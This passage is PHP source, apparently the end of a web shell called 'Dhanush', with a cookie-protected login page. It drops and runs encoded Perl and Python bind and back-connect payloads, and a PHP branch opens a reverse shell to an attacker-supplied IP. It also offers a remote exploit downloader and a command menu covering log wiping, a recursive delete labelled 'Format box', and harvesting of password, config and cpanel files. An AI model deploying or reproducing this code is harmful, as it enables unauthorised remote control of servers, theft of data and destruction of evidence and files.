  5908. if($_POST['lang'] == 'perl')
  5909. {
  5910. if(is_writable("."))
  5911. {
  5912. @$fh=fopen(getcwd()."/",'w');
  5913. @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
  5914. @fclose($fh);
  5915. execmd("chmod 0755 ".getcwd()."/");
  5916. execmd("perl ".getcwd()."/ ".$_POST['port']." ". $passwd ." &");
  5918. $bdmessage = "<pre>$out\n".execmd("ps aux | grep")."</pre>";
  5919. }
  5920. else
  5921. {
  5922. @$fh=fopen("/tmp/","w");
  5923. @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
  5924. @fclose($fh);
  5925. execmd("chmod 0755 ".getcwd()."/");
  5926. execmd("perl ".getcwd()."/ ".$_POST['port']." ". $passwd ." &");
  5927. $bdmessage = "<pre>$out\n".execmd("ps aux | grep")."</pre>";
  5928. }
  5929. }
  5930. }
  5931. }
  5932. else if(isset($_POST['backconnect']))
  5933. {
  5934. if($_POST['ip'] != "" && $_POST['port'] != "")
  5935. { ?><script type="text/javascript">gethome('connect');</script><?php
  5936. $host = $_POST['ip'];
  5937. $port = $_POST['port'];
  5938. if($_POST["lang"] == "perl")
  5939. {
  5940. if(is_writable("."))
  5941. {
  5942. @$fh=fopen(getcwd()."/",'w');
  5943. @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
  5944. @fclose($fh);
  5945. $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
  5946. execmd("perl ".getcwd()."/ $host $port &",$disable);
  5947. if(!@unlink(getcwd()."/")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
  5948. }
  5949. else
  5950. {
  5951. @$fh=fopen("/tmp/","w");
  5952. @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
  5953. @fclose($fh);
  5954. $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
  5955. execmd("perl /tmp/ $host $port &",$disable);
  5956. if(!@unlink("/tmp/"))
  5957. echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
  5958. }
  5959. }
  5960. else if($_POST["lang"] == "python")
  5961. {
  5962. if(is_writable("."))
  5963. {
  5964. $w_file=@fopen(getcwd()."/","w") or die(mysql_error());
  5965. if($w_file)
  5966. {
  5967. @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
  5968. @fclose($w_file);
  5969. chmod(getcwd().'/', 0777);
  5970. }
  5971. execmd("python ".getcwd()."/ $host $port &",$disable);
  5972. $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
  5974. if(!@unlink(getcwd()."/"))
  5975. echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
  5976. }
  5977. else
  5978. {
  5979. $w_file=@fopen("/tmp/","w");
  5980. if($w_file)
  5981. {
  5982. @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
  5983. @fclose($w_file);
  5984. chmod('/tmp/', 0777);
  5985. }
  5986. execmd("python /tmp/ $host $port &",$disable);
  5987. $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
  5988. if(!@unlink("/tmp/"))
  5989. echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
  5990. }
  5991. }
  5992. else if($_POST["lang"] == "php")
  5993. {
  5994. $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
  5995. $ip = $_POST['ip'];
  5996. $port=$_POST['port'];
  5997. $sockfd=fsockopen($ip , $port , $errno, $errstr );
  5998. if($errno != 0)
  5999. {
  6000. $bdmessage = "<font color='red'><b>$errno</b> : $errstr</font>";
  6001. }
  6002. else if (!$sockfd)
  6003. {
  6004. $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
  6005. }
  6006. else
  6007. {
  6008. fputs ($sockfd ,"\n=================================================================\nCoded By Gennike\n=================================================================");
  6009. $pwd = exec_all("pwd");
  6010. $sysinfo = exec_all("uname -a");
  6011. $id = exec_all("id");
  6012. $len = 1337;
  6013. fputs($sockfd ,$sysinfo . "\n" );
  6014. fputs($sockfd ,$pwd . "\n" );
  6015. fputs($sockfd ,$id ."\n\n" );
  6016. fputs($sockfd ,$dateAndTime."\n\n" );
  6017. while(!feof($sockfd))
  6018. {
  6019. $cmdPrompt ="(dhanush)[$]> ";
  6020. fputs ($sockfd , $cmdPrompt );
  6021. $command= fgets($sockfd, $len);
  6022. fputs($sockfd , "\n" . exec_all($command) . "\n\n");
  6023. }
  6024. fclose($sockfd);
  6025. }
  6026. }
  6027. }
  6028. }
  6029. else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
  6030. {
  6031. $temp = "";
  6032. for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
  6033. {
  6034. $uid = @posix_getpwuid($_GET['val1']);
  6035. if ($uid)
  6036. $temp .= join(':',$uid)."\n";
  6037. }
  6038. echo '<br/>';
  6039. paramexe('Users', $temp);
  6040. }
  6041. else if(isset($_GET['download']))
  6042. {
  6043. download();
  6044. }
  6045. else
  6046. {
  6047. ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
  6048. }
  6049. $is_writable = is_writable($dir)?"<font class=txt>&lt; writable &gt;</font>":"&lt; not writable &gt;";
  6050. ?>
  6051. </p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
  6052. <table style="width:100%;border-color:#333333;" border="1">
  6053. <tr>
  6054. <td align="center">
  6055. <form method="post" enctype="multipart/form-data">
  6056. Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
  6057. <input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />&nbsp;
  6058. <input type=submit value="Upload" name="u" value="u" class="but" ></form>
  6059. <span name="wrtble"><?php
  6060. echo $is_writable; ?></span>
  6061. <br>
  6062. </td>
  6063. <td align="center" style="height:105px;">Create File :
  6064. <form onSubmit="createdir('Create',createfile.value);return false;">
  6065. <input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
  6066. <input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
  6067. </form><span name="wrtble">
  6068. <?php echo $is_writable; ?></span>
  6069. </td>
  6070. </tr>
  6071. <tr>
  6072. <td align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
  6073. <input type="text" class="box" name="execute">
  6074. <input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
  6075. <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
  6077. <td align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
  6078. <input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
  6079. <input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
  6080. </form><span name="wrtble"><?php
  6081. echo $is_writable;
  6082. ?></span></td></tr>
  6083. <tr><td style="height:105px;" align="center">Get Exploit&nbsp;<form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
  6084. <input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
  6085. <input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
  6086. <input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
  6087. <select name="functiontype" class="sbox">
  6088. <option value="wwget">wget</option>
  6089. <option value="wlynx">lynx</option>
  6090. <option value="wfread">fread</option>
  6091. <option value="wfetch">fetch</option>
  6092. <option value="wlinks">links</option>
  6093. <option value="wget">GET</option>
  6094. <option value="wcurl">curl</option>
  6095. </select>
  6096. </form><div id="showexp"></div>
  6097. </td>
  6098. <td align="center">
  6099. <form>
  6100. Some Commands<br>
  6101. <?php if($os != "Windows")
  6102. { ?>
  6103. <SELECT NAME="mycmd" class="box">
  6104. <OPTION VALUE="uname -a">Kernel version
  6105. <OPTION VALUE="w">Logged in users
  6106. <OPTION VALUE="lastlog">Last to connect
  6107. <option value='cat /etc/hosts'>IP Addresses
  6108. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
  6109. <OPTION VALUE="logeraser">Log Eraser
  6110. <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
  6111. <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
  6112. <OPTION VALUE="find / -type f -name \"config*\"">find config* files
  6113. <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
  6114. <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
  6115. <OPTION VALUE="find / -type f -perm -04000 -ls">find all suid files
  6116. <OPTION VALUE="find / -user root -perm -022">find all sgid files
  6117. <OPTION VALUE="find . -type f -perm -02000 -ls">find suid files in current dir
  6118. <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
  6119. <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
  6120. <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
  6121. <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
  6122. <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
  6123. <OPTION VALUE="which wget curl w3m lynx">Downloaders?
  6124. <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
  6125. <OPTION VALUE="ps aux">Show running proccess
  6126. <OPTION VALUE="uptime">Uptime check
  6127. <OPTION VALUE="cat /proc/meminfo">Memory check
  6128. <OPTION VALUE="netstat -an | grep -i listen">Open ports
  6129. <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
  6130. <OPTION VALUE="wget">WIPELOGS PT1 (If wget installed)
  6131. <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
  6132. <OPTION VALUE="./zap2">WIPELOGS PT3
  6133. <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
  6134. </SELECT>
  6135. <?php } else {?>
  6136. <SELECT NAME="mycmd" class="box">
  6137. <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
  6138. <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
  6139. <OPTION VALUE="systeminfo">System Informations
  6140. <OPTION VALUE="net user">User accounts
  6141. <OPTION VALUE="netstat -an">Open ports
  6142. <OPTION VALUE="getmac">Get Mac Address
  6143. <OPTION VALUE="net start">Show running services
  6144. <OPTION VALUE="net view">Show computers
  6145. <OPTION VALUE="arp -a">ARP Table
  6146. <OPTION VALUE="tasklist">Show Process
  6147. <OPTION VALUE="ipconfig/all">IP Configuration
  6149. </SELECT>
  6150. <?php } ?>
  6151. <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
  6152. <input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
  6153. </form>
  6154. </td>
  6155. </tr></table><br>
  6157. </td>
  6158. </tr>
  6159. </table>
  6161. <?php
  6164. //logout
  6166. if(isset($_GET['logout']))
  6167. {
  6168. setcookie("hacked",time() - 60*60);
  6169. header("Location:$self");
  6170. ob_end_flush();
  6171. }
  6172. ?>
  6175. <hr color="#1B1B1B">
  6176. <div align="center">
  6177. <font size="6" face="Times New Roman, Times, serif" color="#00CC00">&#2343;&#2344;&#2369;&#2359;<br>
  6178. --==Coded By Gennike==--</font><br><a href="" target="_blank"><font color="#FF0000" size="6">&#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342;</font></a></div>
  6179. <?php
  6180. }
  6181. }
  6183. if(isset($_POST['uname']) && isset($_POST['passwd']))
  6184. {
  6185. if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
  6186. {
  6187. setcookie("hacked", md5($pass));
  6188. $selfenter = $_SERVER["PHP_SELF"];
  6189. header("Location:$selfenter");
  6190. }
  6191. }
  6193. if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
  6194. {
  6195. shellstyle();
  6196. ?>
  6197. <center>
  6198. <form method="POST">
  6199. <div style="background-color:#171717; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
  6200. <table cellpadding="9" cellspacing="4">
  6201. <tr>
  6202. <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
  6203. </tr>
  6204. <tr>
  6205. <td align="right"><b>User Name : </b></td>
  6206. <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value='';'black';}" onBlur="if (this.value == '') {this.value='User Name';'#828282';}" AUTOCOMPLETE="OFF"></td>
  6207. </tr>
  6208. <tr>
  6209. <td align="right"><b>Password : </b></td>
  6210. <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value='';'black';}" onBlur="if (this.value == '') {this.value='User Name';'#828282';}" AUTOCOMPLETE="OFF"></td>
  6211. </tr>
  6212. <tr>
  6213. <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
  6214. </tr>
  6215. <tr>
  6216. <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Gennike==--</b></font></td>
  6217. </tr>
  6218. <tr>
  6219. <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
  6220. </tr>
  6221. </table>
  6222. </div>
  6224. </form>
  6225. </center>
  6226. <br>
  6227. </body>
  6228. </html>
  6229. <?php
  6230. }
  6231. ?>
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